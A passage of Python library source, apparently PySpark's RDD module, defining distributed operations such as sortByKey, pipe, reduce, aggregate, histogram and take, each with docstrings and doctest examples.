>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return (
self.map(lambda v: (v, None))
.cogroup(other.map(lambda v: (v, None)))
.filter(lambda k_vs: all(k_vs[1]))
.keys()
)
def _reserialize(self: "RDD[T]", serializer: Optional[Serializer] = None) -> "RDD[T]":
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self: "RDD[T]", other: "RDD[U]") -> "RDD[Union[T, U]]":
"""
Return the union of this RDD and another one.
Examples
--------
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
@overload
def repartitionAndSortWithinPartitions(
self: "RDD[Tuple[S, V]]",
numPartitions: Optional[int] = ...,
partitionFunc: Callable[["S"], int] = ...,
ascending: bool = ...,
) -> "RDD[Tuple[S, V]]":
...
@overload
def repartitionAndSortWithinPartitions(
self: "RDD[Tuple[K, V]]",
numPartitions: Optional[int],
partitionFunc: Callable[[K], int],
ascending: bool,
keyfunc: Callable[[K], "S"],
) -> "RDD[Tuple[K, V]]":
...
@overload
def repartitionAndSortWithinPartitions(
self: "RDD[Tuple[K, V]]",
numPartitions: Optional[int] = ...,
partitionFunc: Callable[[K], int] = ...,
ascending: bool = ...,
*,
keyfunc: Callable[[K], "S"],
) -> "RDD[Tuple[K, V]]":
...
def repartitionAndSortWithinPartitions(
self: "RDD[Tuple[Any, Any]]",
numPartitions: Optional[int] = None,
partitionFunc: Callable[[Any], int] = portable_hash,
ascending: bool = True,
keyfunc: Callable[[Any], Any] = lambda x: x,
) -> "RDD[Tuple[Any, Any]]":
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
Examples
--------
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, True)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator: Iterable[Tuple[K, V]]) -> Iterable[Tuple[K, V]]:
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
@overload
def sortByKey(
self: "RDD[Tuple[S, V]]",
ascending: bool = ...,
numPartitions: Optional[int] = ...,
) -> "RDD[Tuple[K, V]]":
...
@overload
def sortByKey(
self: "RDD[Tuple[K, V]]",
ascending: bool,
numPartitions: int,
keyfunc: Callable[[K], "S"],
) -> "RDD[Tuple[K, V]]":
...
@overload
def sortByKey(
self: "RDD[Tuple[K, V]]",
ascending: bool = ...,
numPartitions: Optional[int] = ...,
*,
keyfunc: Callable[[K], "S"],
) -> "RDD[Tuple[K, V]]":
...
def sortByKey(
self: "RDD[Tuple[K, V]]",
ascending: Optional[bool] = True,
numPartitions: Optional[int] = None,
keyfunc: Callable[[Any], Any] = lambda x: x,
) -> "RDD[Tuple[K, V]]":
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
Examples
--------
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator: Iterable[Tuple[K, V]]) -> Iterable[Tuple[K, V]]:
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
samples = sorted(samples, key=keyfunc)
# we have numPartitions many parts but one of the them has
# an implicit boundary
bounds = [
samples[int(len(samples) * (i + 1) / numPartitions)]
for i in range(0, numPartitions - 1)
]
def rangePartitioner(k: K) -> int:
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p # type: ignore[operator]
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(
self: "RDD[T]",
keyfunc: Callable[[T], "S"],
ascending: bool = True,
numPartitions: Optional[int] = None,
) -> "RDD[T]":
"""
Sorts this RDD by the given keyfunc
Examples
--------
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return (
self.keyBy(keyfunc) # type: ignore[type-var]
.sortByKey(ascending, numPartitions)
.values()
)
def glom(self: "RDD[T]") -> "RDD[List[T]]":
"""
Return an RDD created by coalescing all elements within each partition
into a list.
Examples
--------
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator: Iterable[T]) -> Iterable[List[T]]:
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self: "RDD[T]", other: "RDD[U]") -> "RDD[Tuple[T, U]]":
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements ``(a, b)`` where ``a`` is in `self` and
``b`` is in `other`.
Examples
--------
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer, other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(
self: "RDD[T]",
f: Callable[[T], K],
numPartitions: Optional[int] = None,
partitionFunc: Callable[[K], int] = portable_hash,
) -> "RDD[Tuple[K, Iterable[T]]]":
"""
Return an RDD of grouped items.
Examples
--------
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions, partitionFunc)
def pipe(
self, command: str, env: Optional[Dict[str, str]] = None, checkCode: bool = False
) -> "RDD[str]":
"""
Return an RDD created by piping elements to a forked external process.
Parameters
----------
command : str
command to run.
env : dict, optional
environment variables to set.
checkCode : bool, optional
whether or not to check the return value of the shell command.
Examples
--------
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
['1', '2', '', '3']
"""
if env is None:
env = dict()
def func(iterator: Iterable[T]) -> Iterable[str]:
pipe = Popen(shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out: IO[bytes]) -> None:
for obj in iterator:
s = str(obj).rstrip("\n") + "\n"
out.write(s.encode("utf-8"))
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
def check_return_code() -> Iterable[int]:
pipe.wait()
if checkCode and pipe.returncode:
raise RuntimeError(
"Pipe function `%s' exited "
"with error code %d" % (command, pipe.returncode)
)
else:
for i in range(0):
yield i
return (
cast(bytes, x).rstrip(b"\n").decode("utf-8")
for x in chain(
iter(cast(IO[bytes], pipe.stdout).readline, b""), check_return_code()
)
)
return self.mapPartitions(func)
def foreach(self: "RDD[T]", f: Callable[[T], None]) -> None:
"""
Applies a function to all elements of this RDD.
Examples
--------
>>> def f(x): print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
f = fail_on_stopiteration(f)
def processPartition(iterator: Iterable[T]) -> Iterable[Any]:
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self: "RDD[T]", f: Callable[[Iterable[T]], None]) -> None:
"""
Applies a function to each partition of this RDD.
Examples
--------
>>> def f(iterator):
... for x in iterator:
... print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it: Iterable[T]) -> Iterable[Any]:
r = f(it)
try:
return iter(r) # type: ignore[call-overload]
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self: "RDD[T]") -> List[T]:
"""
Return a list that contains all of the elements in this RDD.
Notes
-----
This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
"""
with SCCallSiteSync(self.context):
assert self.ctx._jvm is not None
sock_info = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(sock_info, self._jrdd_deserializer))
def collectWithJobGroup(
self: "RDD[T]", groupId: str, description: str, interruptOnCancel: bool = False
) -> "List[T]":
"""
When collect rdd, use this method to specify job group.
.. versionadded:: 3.0.0
.. deprecated:: 3.1.0
Use :class:`pyspark.InheritableThread` with the pinned thread mode enabled.
"""
warnings.warn(
"Deprecated in 3.1, Use pyspark.InheritableThread with "
"the pinned thread mode enabled.",
FutureWarning,
)
with SCCallSiteSync(self.context):
assert self.ctx._jvm is not None
sock_info = self.ctx._jvm.PythonRDD.collectAndServeWithJobGroup(
self._jrdd.rdd(), groupId, description, interruptOnCancel
)
return list(_load_from_socket(sock_info, self._jrdd_deserializer))
def reduce(self: "RDD[T]", f: Callable[[T, T], T]) -> T:
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
Examples
--------
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
f = fail_on_stopiteration(f)
def func(iterator: Iterable[T]) -> Iterable[T]:
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self: "RDD[T]", f: Callable[[T, T], T], depth: int = 2) -> T:
"""
Reduces the elements of this RDD in a multi-level tree pattern.
Parameters
----------
f : function
depth : int, optional
suggested depth of the tree (default: 2)
Examples
--------
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
# Use the second entry to indicate whether this is a dummy value.
zeroValue: Tuple[T, bool] = ( # type: ignore[assignment]
None,
True,
)
def op(x: Tuple[T, bool], y: Tuple[T, bool]) -> Tuple[T, bool]:
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False # type: ignore[arg-type]
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self: "RDD[T]", zeroValue: T, op: Callable[[T, T], T]) -> T:
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero value."
The function ``op(t1, t2)`` is allowed to modify ``t1`` and return it
as its result value to avoid object allocation; however, it should not
modify ``t2``.
This behaves somewhat differently from fold operations implemented
for non-distributed collections in functional languages like Scala.
This fold operation may be applied to partitions individually, and then
fold those results into the final result, rather than apply the fold
to each element sequentially in some defined ordering. For functions
that are not commutative, the result may differ from that of a fold
applied to a non-distributed collection.
Examples
--------
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
op = fail_on_stopiteration(op)
def func(iterator: Iterable[T]) -> Iterable[T]:
acc = zeroValue
for obj in iterator:
acc = op(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(
self: "RDD[T]", zeroValue: U, seqOp: Callable[[U, T], U], combOp: Callable[[U, U], U]
) -> U:
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions ``op(t1, t2)`` is allowed to modify ``t1`` and return it
as its result value to avoid object allocation; however, it should not
modify ``t2``.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
an U and one operation for merging two U
Examples
--------
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
seqOp = fail_on_stopiteration(seqOp)
combOp = fail_on_stopiteration(combOp)
def func(iterator: Iterable[T]) -> Iterable[U]:
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(combOp, vals, zeroValue)
def treeAggregate(
self: "RDD[T]",
zeroValue: U,
seqOp: Callable[[U, T], U],
combOp: Callable[[U, U], U],
depth: int = 2,
) -> U:
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
depth : int, optional
suggested depth of the tree (default: 2)
Examples
--------
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator: Iterable[T]) -> Iterable[U]:
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale # type: ignore[assignment]
curNumPartitions = int(numPartitions)
def mapPartition(i: int, iterator: Iterable[U]) -> Iterable[Tuple[int, U]]:
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = (
partiallyAggregated.mapPartitionsWithIndex(mapPartition)
.reduceByKey(combOp, curNumPartitions)
.values()
)
return partiallyAggregated.reduce(combOp)
@overload
def max(self: "RDD[S]") -> "S":
...
@overload
def max(self: "RDD[T]", key: Callable[[T], "S"]) -> T:
...
def max(self: "RDD[T]", key: Optional[Callable[[T], "S"]] = None) -> T:
"""
Find the maximum item in this RDD.
Parameters
----------
key : function, optional
A function used to generate key for comparing
Examples
--------
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max) # type: ignore[arg-type]
return self.reduce(lambda a, b: max(a, b, key=key)) # type: ignore[arg-type]
@overload
def min(self: "RDD[S]") -> "S":
...
@overload
def min(self: "RDD[T]", key: Callable[[T], "S"]) -> T:
...
def min(self: "RDD[T]", key: Optional[Callable[[T], "S"]] = None) -> T:
"""
Find the minimum item in this RDD.
Parameters
----------
key : function, optional
A function used to generate key for comparing
Examples
--------
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min) # type: ignore[arg-type]
return self.reduce(lambda a, b: min(a, b, key=key)) # type: ignore[arg-type]
def sum(self: "RDD[NumberOrArray]") -> "NumberOrArray":
"""
Add up the elements in this RDD.
Examples
--------
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).fold( # type: ignore[return-value]
0, operator.add
)
def count(self) -> int:
"""
Return the number of elements in this RDD.
Examples
--------
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self: "RDD[NumberOrArray]") -> StatCounter:
"""
Return a :class:`StatCounter` object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter: StatCounter, right_counter: StatCounter) -> StatCounter:
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce( # type: ignore[arg-type]
redFunc
)
def histogram(
self: "RDD[S]", buckets: Union[int, List["S"], Tuple["S", ...]]
) -> Tuple[Sequence["S"], List[int]]:
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
which means 1<=x<10, 10<=x<20, 20<=x<=50. And on the input of 1
and 50 we would have a histogram of 1,0,1.
If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
this can be switched from an O(log n) insertion to O(1) per
element (where n is the number of buckets).
Buckets must be sorted, not contain any duplicates, and have
at least two elements.
If `buckets` is a number, it will generate buckets which are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given `buckets`
as 2, the resulting buckets will be [0,50) [50,100]. `buckets` must
be at least 1. An exception is raised if the RDD contains infinity.
If the elements in the RDD do not vary (max == min), a single bucket
will be used.
The return value is a tuple of buckets and histogram.
Examples
--------
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, int):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x: Any) -> bool:
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a: Tuple["S", "S"], b: Tuple["S", "S"]) -> Tuple["S", "S"]:
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets # type: ignore[operator]
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
inc = int(inc)
if inc * buckets != maxv - minv: # type: ignore[operator]
inc = (maxv - minv) * 1.0 / buckets # type: ignore[operator]
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [
buckets[i + 1] - buckets[i] # type: ignore[operator]
for i in range(len(buckets) - 1)
]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1) # type: ignore[operator]
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator: Iterable["S"]) -> Iterable[List[int]]:
counters = [0] * len(buckets) # type: ignore[arg-type]
for i in iterator:
if (
i is None
or (isinstance(i, float) and isnan(i)) # type: ignore[arg-type]
or i > maxv
or i < minv
):
continue
t = (
int((i - minv) / inc) # type: ignore[operator]
if even
else bisect.bisect_right(buckets, i) - 1 # type: ignore[arg-type]
)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a: List[int], b: List[int]) -> List[int]:
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self: "RDD[NumberOrArray]") -> "NumberOrArray":
"""
Compute the mean of this RDD's elements.
Examples
--------
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean() # type: ignore[return-value]
def variance(self: "RDD[NumberOrArray]") -> "NumberOrArray":
"""
Compute the variance of this RDD's elements.
Examples
--------
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance() # type: ignore[return-value]
def stdev(self: "RDD[NumberOrArray]") -> "NumberOrArray":
"""
Compute the standard deviation of this RDD's elements.
Examples
--------
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev() # type: ignore[return-value]
def sampleStdev(self: "RDD[NumberOrArray]") -> "NumberOrArray":
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
Examples
--------
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev() # type: ignore[return-value]
def sampleVariance(self: "RDD[NumberOrArray]") -> "NumberOrArray":
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
Examples
--------
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance() # type: ignore[return-value]
def countByValue(self: "RDD[K]") -> Dict[K, int]:
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
Examples
--------
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator: Iterable[K]) -> Iterable[Dict[K, int]]:
counts: Dict[K, int] = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1: Dict[K, int], m2: Dict[K, int]) -> Dict[K, int]:
for k, v in m2.items():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
@overload
def top(self: "RDD[S]", num: int) -> List["S"]:
...
@overload
def top(self: "RDD[T]", num: int, key: Callable[[T], "S"]) -> List[T]:
...
def top(self: "RDD[T]", num: int, key: Optional[Callable[[T], "S"]] = None) -> List[T]:
"""
Get the top N elements from an RDD.
Notes
-----
This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
It returns the list sorted in descending order.
Examples
--------
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator: Iterable[T]) -> Iterable[List[T]]:
yield heapq.nlargest(num, iterator, key=key)
def merge(a: List[T], b: List[T]) -> List[T]:
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
@overload
def takeOrdered(self: "RDD[S]", num: int) -> List["S"]:
...
@overload
def takeOrdered(self: "RDD[T]", num: int, key: Callable[[T], "S"]) -> List[T]:
...
def takeOrdered(self: "RDD[T]", num: int, key: Optional[Callable[[T], "S"]] = None) -> List[T]:
"""
Get the N elements from an RDD ordered in ascending order or as
specified by the optional key function.
Notes
-----
This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
Examples
--------
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a: List[T], b: List[T]) -> List[T]:
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self: "RDD[T]", num: int) -> List[T]:
"""
Take the first num elements of the RDD.
It works by first scanning one partition, and use the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
Notes
-----
This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
Examples
--------
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items: List[T] = []
totalParts = self.getNumPartitions()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
# the first parameter of max is >=1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
left = num - len(items)
def takeUpToNumLeft(iterator: Iterable[T]) -> Iterable[T]:
iterator = iter(iterator)
taken = 0
while taken < left:
try:
yield next(iterator)
except StopIteration:
return
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self: "RDD[T]") -> T:
"""
Return the first element in this RDD.
Examples
--------
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self) -> bool:
"""
Returns true if and only if the RDD contains no elements at all.
Notes
-----
An RDD may be empty even when it has at least 1 partition.
Examples
--------
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self.getNumPartitions() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(
self: "RDD[Tuple[K, V]]",
conf: Dict[str, str],
keyConverter: Optional[str] = None,
valueConverter: Optional[str] = None,
) -> None:
"""
Output a Python RDD of key-value pairs (of form ``RDD[(K, V)]``) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
"org.apache.spark.api.python.JavaToWritableConverter".
Parameters
----------
conf : dict
Hadoop job configuration
keyConverter : str, optional
fully qualified classname of key converter (None by default)
valueConverter : str, optional
fully qualified classname of value converter (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
assert self.ctx._jvm is not None
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(
pickledRDD._jrdd, True, jconf, keyConverter, valueConverter, True
)
def saveAsNewAPIHadoopFile(
self: "RDD[Tuple[K, V]]",
path: str,
outputFormatClass: str,
keyClass: Optional[str] = None,
valueClass: Optional[str] = None,
keyConverter: Optional[str] = None,
valueConverter: Optional[str] = None,
conf: Optional[Dict[str, str]] = None,
) -> None:
"""
Output a Python RDD of key-value pairs (of form ``RDD[(K, V)]``) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or "org.apache.spark.api.python.JavaToWritableConverter". The
`conf` is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
path : str
path to Hadoop file
outputFormatClass : str
fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
keyClass : str, optional
fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
valueClass : str, optional
